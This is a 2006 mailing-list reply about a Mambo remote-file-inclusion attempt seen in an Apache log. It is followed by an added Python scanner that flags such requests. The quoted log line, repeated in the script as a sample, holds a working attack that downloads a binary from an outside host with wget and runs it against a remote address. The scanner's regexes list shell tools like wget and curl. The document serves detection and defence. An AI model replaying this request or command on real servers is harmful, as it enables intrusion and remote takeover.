
Re: Strange Apache log and mambo security - sexy executable



Just a couple of things:

Apache configured with mod_rewrite to deny blank or fake referers is a
good idea.

Do you have Apache configured with mod_security?  I highly recommend this
last one, since you run a PHP-based CMS and it can protect against exploits
not yet discovered.


On Mon, January 23, 2006 2:32 am, Maik Holtkamp said:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Edward Shornock wrote:
>> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
>> > Hi,
>> >
>> > yesterday morning I found a strange entry in my apache log files
>> (debian
>> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
>> > Server, just serving my Family and some good friends (normally).
>> >
>> > ---cut---
>> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
>> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
>> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
>> >  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
>> 5.1;)"
>> > ---cut---
>> >
>> > As I patched mambo against the recent "register global" attack and my /tmp
>> > is mounted noexec, the attack doesn't exploit anything.
>> >
>> > However, I curiously downloaded this sexy executable to have a closer
>> look.
>> >
>> > ---cut---
>> > backup:/home/qmb# ./sexy -h
>> > ./sexy <host> <port>
>> > ---cut---
>> >
>> Never run apps like this as root.  Bad bad idea.
>
> There is an old saying in Germany:
>
> "Only damage will make you wise"

Funny, Don Quixote (when in a good mood) used to say, "Sancho, why does
experience always come when it is not needed?"*

*I am just paraphrasing...




-- 
-JM. "Estos días azules y este sol de la infancia" (Antonio Machado, 1939) [These blue days and this sun of childhood]
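The log entry quoted above is the classic Mambo register_globals / remote file inclusion pattern: the client supplies `GLOBALS=` and `_REQUEST[...]` to overwrite PHP variables, points `mosConfig_absolute_path` at a URL so the script's include() fetches the attacker's file, and passes the drop-and-run shell string in `cmd`. The script below, an added example for this thread and not code from any of the posts, parses Apache combined-log lines and flags those indicators, which is a useful log-side complement to the request-time filtering mod_security does. It also shows that the request carried a blank Referer (`"-"`), so a blank-referer mod_rewrite deny would have matched it; the caveat is that Referer is attacker-supplied and is missing from plenty of legitimate requests, so it is a weak signal on its own. Both sample lines are constructed: the first is the quoted entry re-joined onto one line, the second a benign request invented for contrast.

```python
"""Flag the register_globals / remote-file-inclusion request pattern in
Apache combined-log lines.  Added example, not code from the thread.
Sample lines are constructed (the first re-joins the quoted log entry)."""
import re
from urllib.parse import unquote

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# With register_globals=On, a query parameter named like a PHP superglobal
# (GLOBALS, _REQUEST[...], ...) becomes that variable inside the script.
SUPERGLOBAL_RE = re.compile(
    r'^(?:GLOBALS|_(?:GET|POST|REQUEST|COOKIE|SERVER|SESSION|FILES|ENV))(?:\[|$)')
# Mambo configuration variables that its scripts prepend to include() paths;
# these must come from configuration.php, never from the client.
CONFIG_VAR_RE = re.compile(r'^mosConfig_')
# A parameter value that is itself a URL: with allow_url_fopen=On the
# include() fetches and executes the remote file.  The trailing '?' in the
# attacker's URL turns whatever the script appends into a query string.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Fragments of the "drop a binary and run it" stage: cd /tmp; wget; chmod; ./x
SHELL_RE = re.compile(r'(?:^|[;\s])(?:cd|wget|curl|chmod|perl|sh)\s|\./\S+|/tmp')

# Constructed sample: the quoted entry re-joined onto one line.
ATTACK_LINE = (
    '132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET /cvs/index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;'
    'wget%20212.203.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;'
    '00;echo%20YYY;echo| HTTP/1.1" 200 28 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"'
)
# Constructed sample: an ordinary Mambo page view.
BENIGN_LINE = (
    '10.0.0.5 - - [19/Jan/2006:08:00:00 +0100] "GET /cvs/index.php?'
    'option=com_content&task=view&id=12&Itemid=1 HTTP/1.1" 200 5120 '
    '"http://example.org/cvs/" "Mozilla/5.0"'
)


def parse_log_line(line):
    """Return the named fields of one combined-log line, or None if it
    does not match the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_query(target):
    """Split the request target's query string into decoded (name, value)
    pairs.  Splits on '&' only: ';' is the shell separator the attacker
    relies on inside the 'cmd' value and must stay part of it."""
    query = target.partition('?')[2]
    pairs = []
    for item in query.split('&'):
        if not item:
            continue
        name, _, value = item.partition('=')
        pairs.append((unquote(name), unquote(value)))
    return pairs


def inspect_request(rec):
    """Return a list of findings for one parsed record (empty when nothing
    resembles the register_globals / RFI pattern)."""
    findings = []
    for name, value in parse_query(rec['target']):
        if SUPERGLOBAL_RE.match(name):
            findings.append(f'superglobal override via register_globals: {name}')
        if CONFIG_VAR_RE.match(name):
            findings.append(f'config variable supplied by client: {name}')
        if REMOTE_URL_RE.match(value):
            findings.append(f'remote file inclusion: {name}={value}')
        if SHELL_RE.search(value):
            findings.append(f'shell command in parameter: {name}')
    return findings


def referer_is_blank(rec):
    """True when the request carried no Referer ('-' in the log).  A
    mod_rewrite rule denying blank referers would have matched, but the
    header is attacker-controlled, so treat this as a weak signal only."""
    return rec['referer'] in ('', '-')


def scan(lines):
    """Parse each line and return [(client host, findings)] for every line
    that matches the combined-log format."""
    results = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is not None:
            results.append((rec['host'], inspect_request(rec)))
    return results


if __name__ == '__main__':
    for host, findings in scan([ATTACK_LINE, BENIGN_LINE]):
        print(host, findings or 'clean')
```

Feeding the quoted entry through `scan` yields six findings for the attacking host (three superglobal overrides, the injected `mosConfig_absolute_path`, the remote URL in it, and the shell string in `cmd`) and none for the benign request. The status field is parsed too, so the same records can be filtered on the `200` the quoted entry shows, which is the first thing to check when deciding whether such a request actually reached a vulnerable include().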


